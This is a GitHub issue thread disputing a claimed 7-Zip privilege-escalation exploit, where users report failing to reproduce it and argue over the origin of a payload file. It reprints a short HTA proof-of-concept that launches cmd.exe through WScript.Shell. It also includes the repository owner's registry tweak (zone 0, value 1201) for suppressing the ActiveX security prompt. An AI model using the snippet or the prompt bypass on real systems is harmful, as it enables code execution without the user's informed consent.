Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

I can't reproduce #8

Open
Easthrone opened this issue Apr 19, 2022 · 8 comments
Open

I can't reproduce #8

Easthrone opened this issue Apr 19, 2022 · 8 comments

Comments

@Easthrone
Copy link

I can't reproduce the problem described in your video. what is the "privese.exe"? Is this what caused it?
@HenkPoley
Copy link

Most probably there is no issue.

If there actually is a privilege escalation, that bug is not an issue with 7zip or Microsoft® HTML Help Executable (HH.exe). But with Microsoft Windows.

Kağan Çapar keeps posting different explanations. The common theme for that would be, that there actually is no issue. He probably just tries to make a up a cloud of plausibility.

Kağan Çapar posted this file to Tavis Ormandy (from Google Zero). If you extract it, it might hose your NTFS (older Windows), or just drop hard to remove files ("just some naïve attempt at directory traversal that couldn't possibly work"). The file is made by/for jasonLyk. It does not show this exploit. It shows a different issue.

7zip by default does not run with elevated privileges. It should not be able to get them by itself. Unless there is an issue with Windows. If 7zip can do it, other programs should be able to as well.

If there is a bug, it is not a bug in 7zip.

@kagancapar
Copy link
Owner

That file doesn't even belong to me. I've been making fun of tavis since yesterday I don't have to send him the payload.

@liudonghua123
Copy link

I could not reproduce either. When I try to drag a 7z file into the chm content window, I only got Do you want to open or save this file?.

Video_2022-04-22_091551-converted.mp4

@liudonghua123
Copy link

liudonghua123 commented Apr 22, 2022
edited
Loading

I create a HTML file which contains the public POC in https://dl.packetstormsecurity.net/2204-exploits/7zip-escalate.txt. And rename it to a 7z file. Then I got a warning. When I click yes, I can only get the current user shell, not the system user shell.

<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>

image

Video_2022-04-22_095533-converted.mp4

I also tried to drag the HTML file to the chm content window. IT IS THE SAME.

@brlin-tw
Copy link

brlin-tw commented Apr 22, 2022
edited
Loading

@kagancapar

That file doesn't even belong to me. I've been making fun of tavis since yesterday I don't have to send him the payload.

Regardless of what that actually means I've made a Wayback Machine backup for future references, cheers!

@kagancapar
Copy link
Owner

Most probably there is no issue.

If there actually is a privilege escalation, that bug is not an issue with 7zip or Microsoft® HTML Help Executable (HH.exe). But with Microsoft Windows.

Kağan Çapar keeps posting different explanations. The common theme for that would be, that there actually is no issue. He probably just tries to make a up a cloud of plausibility.

Kağan Çapar posted this file to Tavis Ormandy (from Google Zero). If you extract it, it might hose your NTFS (older Windows), or just drop hard to remove files ("just some naïve attempt at directory traversal that couldn't possibly work"). The file is made by/for jasonLyk. It does not show this exploit. It shows a different issue.

7zip by default does not run with elevated privileges. It should not be able to get them by itself. Unless there is an issue with Windows. If 7zip can do it, other programs should be able to as well.

If there is a bug, it is not a bug in 7zip.

Even though I said that this file does not belong to me, you still continue to talk as if it is mine. I don't take you seriously, don't waste your breath for nothing. Don't stop insulting me on twitter. We are not even in the same class. I'm posting the link again this file is not mine it was purely done to troll Tavis.

https://tweetstamp.org/1515691512553742347

@kagancapar
Copy link
Owner

I create a HTML file which contains the public POC in https://dl.packetstormsecurity.net/2204-exploits/7zip-escalate.txt. And rename it to a 7z file. Then I got a warning. When I click yes, I can only get the current user shell, not the system user shell.

<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>

image

Video_2022-04-22_095533-converted.mp4
I also tried to drag the HTML file to the chm content window. IT IS THE SAME.

This is not the poc code of privesc attack. Also, a tip for you to bypass activex before working inside the payload.
"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
If it checks "1201"=dword:00000000" and this DWORD has a value of 1, it will set it to 0 and the popup will be bypassed.

@brlin-tw
Copy link

brlin-tw commented Apr 22, 2022
edited
Loading

@kagancapar

(...stripped...)
The file is made by/for jasonLyk. It does not show this exploit. It shows a different issue.

Even though I said that this file does not belong to me, you still continue to talk as if it is mine.

False. Even Tavis themself has clearly attributed it correctly:

When I told him that, he said "that file doesn't belong to me anyway" - then explained he was planning his wedding and was too busy to answer more questions.

-- source

I'm posting the link again this file is not mine it was purely done to troll Tavis.

I failed to see how that behavior would help anyone.

# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@liudonghua123 @HenkPoley @brlin-tw @kagancapar @Easthrone